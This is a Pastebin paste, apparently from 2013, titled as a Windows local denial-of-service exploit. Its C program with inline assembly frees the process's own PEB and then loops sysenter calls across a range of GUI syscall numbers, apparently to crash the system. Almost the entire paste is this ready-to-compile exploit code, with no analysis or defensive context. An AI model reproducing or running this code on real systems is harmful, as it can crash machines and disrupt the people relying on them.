API tools faq
paste
elvanderb

Windows Local DOS (free PEB + gui syscall)

elvanderb
Dec 19th, 2013
332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.75 KB | None | 0 0
raw download clone embed print report
  1. #include <windows.h>
  2. #define sysenter __asm _emit 0x0F __asm _emit 0x34
  3.  
  4. void freePEB()
  5. {
  6.     HANDLE hProc = GetCurrentProcess();
  7.     PVOID PEBaddr;
  8.  
  9.     __asm {
  10.         mov eax , DWORD ptr FS:[0x30]
  11.         mov DWORD ptr [PEBaddr] , eax
  12.     }
  13.     VirtualFreeEx(hProc, PEBaddr, 0, MEM_DECOMMIT);
  14. }
  15.  
  16.  
  17. int main()
  18. {
  19.     DWORD i;
  20.  
  21.     freePEB();
  22.     // magic syscall is not the same on all windows version ...
  23.     for (i = 0x10000; i < 0x20000; i++)
  24.     __asm{
  25.         // null timeouts, avoid hangs
  26.         push 0
  27.         push 0
  28.         push 0
  29.         push 0
  30.         push 0
  31.         push ret_sysenter
  32.         mov edx, esp
  33.         mov     eax, dword ptr [i]
  34.         sysenter
  35.         ret_sysenter:
  36.         add esp, 5*4
  37.     }
  38.     return 0;
  39. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!